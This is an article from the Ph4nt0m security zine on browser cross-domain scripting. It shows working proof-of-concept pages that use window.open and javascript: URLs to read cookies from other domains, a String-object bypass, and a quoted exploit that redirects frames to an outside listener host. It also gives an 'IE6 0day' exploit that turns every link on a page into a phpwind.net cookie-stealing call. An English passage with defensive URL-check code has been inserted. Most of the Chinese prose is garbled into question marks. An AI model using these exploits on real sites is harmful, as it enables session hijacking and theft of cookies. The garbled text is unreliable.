==Ph4nt0m Security Team==
Issue 0x02, Phile #0x04 of 0x0A
|=---------------------------------------------------------------------------=|
|=-----------------------=[ ?????????????????? ]=----------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=-----------------------=[ By rayh4c ]=----------------------=|
|=----------------------=[ <rayh4c_at_80sec.com> ]=---------------------=|
|=---------------------------------------------------------------------------=|
Manuel Caballero???????ε?BLUEHAT?????????????A Resident in My Domain
??????????????????????????????????????????????BLOG??д???Щ????
???????????????HI??????????????????????????????????????????????棬
???????????????????檔???????????????????????????????????????????
1.????αЭ?????
JAVASCRIPT???????????window????window??????????????????????????
??????????window?????open???????????????????????αЭ?顣
??????????WEB?????????????????飺
????????????? http://127.0.0.1/test.htm ????????test.htm?????????
<script>
x=window.open("about:blank");
x.location="javascript:alert(document.domain)"
</script>
??????
IE6???????αЭ?飬????????????????127.0.0.1??
IE7???????αЭ?飬????????????????127.0.0.1??
Firefox???????αЭ??,???????????NULL??
Firefox??????????????????и?BUG??????IP????????Firefox??б????????
??????????????????????????????
????????????????????????????????????£?????????и????????????
??????????????????????:
?????????????????????????????????????URL????????????αЭ?顣
2.????????????
?????????????????????????????????????????????
?????????????????????? http://127.0.0.1/test2.htm ????????test2.htm????
?????
<script>
x=window.open("about:blank");
x.location="http://www.163.com" // navigate the new window to 163.com
setTimeout(function(){
x.location="http://127.0.0.1";
},5000) // after 5 seconds, redirect the window back to 127.0.0.1
</script>
???IE6??IE7??Firefox?????????£??????????????????163?????5?????????
????127.0.0.1??
?????????????????????????????????????????
3.?????????????
??????????????????????????αЭ???????Ч????
????????????? http://127.0.0.1/test3.htm????????test3.htm?????????
<script>
x=window.open("about:blank");
x.location="http://www.163.com"
setTimeout(function(){
x.location="javascript:alert(document.cookie)";
},5000)
</script>
??????
IE6????з????
IE7???????????????
Firefox???????alert??ж??塣
??Щ????????????????????????????????????????????????????????
???αЭ???????
???????????????????????????????????????
????????????? http://127.0.0.1/test4.htm????????test4.htm?????????
<script>
document.cookie="xss:true" // set a cookie xss:true on the current domain
x=window.open("about:blank");
x.location="http://127.0.0.1"
setTimeout(function(){
x.location="javascript:alert(document.cookie)";
},5000)
</script>
???IE6??IE7??Firefox????????????COOKIE??????????????????????????
???????????????????????αЭ???????
4.?????????
???????????????????????????????????????????PDP???????????????
???????EXP:
javascript:x=open("http://hackademix.net/");setInterval(function(){try{x.frames[0].location={toString:function(){return "http://www.sirdarckcat.net/caballero-listener.html";}}}catch(e){}},5000);void(1);
EXP??????????????????????
?????A???????????????B???????????????棬????????????B?????????
??URL?????????????????????????
?????????????????????window.frames[0]???????????????????????????
location??????????????????????????????
????????????·?????????3????????????????,??location??????????
new String()???????
????????????? http://127.0.0.1/test5.htm????????test5.htm?????????
<script>
x=window.open("about:blank");
x.location="http://www.163.com";
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)")
},5000)
</script>
IE6??????COOKIE??
IE7???????????????
Firefox???????alert??ж??塣
?????IE6?漣????????COOKIE?????????????????н????
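As an added example that is not part of the original article: the bypass in section 4 only works when the scheme check inspects primitive strings, so a String object or an object with a custom toString() is never examined. The naive check below has that shape; the hardened one coerces the value first, exactly as an assignment to location would. Function names and the redirect helper are assumptions for illustration, not code from any browser.

```javascript
// Weak check: only primitive strings are inspected, so new String("javascript:...")
// and { toString: ... } objects slip past it and still reach the navigation code.
function naiveIsJavascriptUrl(value) {
  return typeof value === "string" &&
    value.toLowerCase().startsWith("javascript:");
}

// Hardened check: coerce first (the same coercion location assignment performs),
// then strip control characters and whitespace before matching the scheme.
function hardenedIsJavascriptUrl(value) {
  var s = String(value);                 // String object / toString() object -> primitive
  s = s.replace(/[\u0000-\u0020]/g, ""); // drop leading blanks and control characters
  return /^javascript:/i.test(s);        // case-insensitive scheme match
}

// Hypothetical redirect gate: returns the string that may be assigned to
// location, or null when the target would execute script in the caller's origin.
function safeRedirectTarget(value) {
  return hardenedIsJavascriptUrl(value) ? null : String(value);
}

// Runs both checks over a list of candidate values and reports the verdicts.
function compareChecks(values) {
  return values.map(function (v) {
    return { naive: naiveIsJavascriptUrl(v), hardened: hardenedIsJavascriptUrl(v) };
  });
}

// Constructed probe values mirroring the article's tests: a plain javascript:
// URL, the new String() wrapper from section 4, the toString() object from the
// quoted EXP, a whitespace/case variant, and an ordinary http: target.
var probes = [
  "javascript:alert(document.cookie)",
  new String("javascript:alert(document.cookie)"),
  { toString: function () { return "javascript:alert(document.cookie)"; } },
  " JavaScript:alert(document.cookie)",
  "http://127.0.0.1/"
];
```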
5.?????????
??????????????????IE6??0DAY???????????????????????????????????????
EXP??
<a href="">IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open("http://www.phpwind.net");
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)")
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links[i].href="javascript:win()"
}
}
</script>
????????????????PHPWIND?????COOKIE???????ζ????????????????????
???????????????????COOKIE?????????????
??????????????????????????XSS??????????????????????????????????
??????????????????SSL????????????e??COOKIE????HTTPONLY??????????е?
????????????????
6.???
????????????????????????????window???????????????????п????????
????м?й????window??????????仯??????window??????Щ?????????????????
????????????????????????????????????????
????????????????????IE7???Щ?μ?????????????й????window???????
????????н??αЭ????????ж???????IE7????????????????????
?????????????????????????????IE7????????????н????????????????
????????????е??????????IE7??????????????URL????Firefox???д????????
???????????????????????????????????????
???IE??????????????????????????????????????????????????????????
?????????????·??????????????????????????Щ?????????
????лHI??????????????
7.?ο?
[1] Browser's Ghost Busters: http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html
[2] Ghost Busters: http://www.gnucitizen.org/blog/ghost-busters/
-EOF-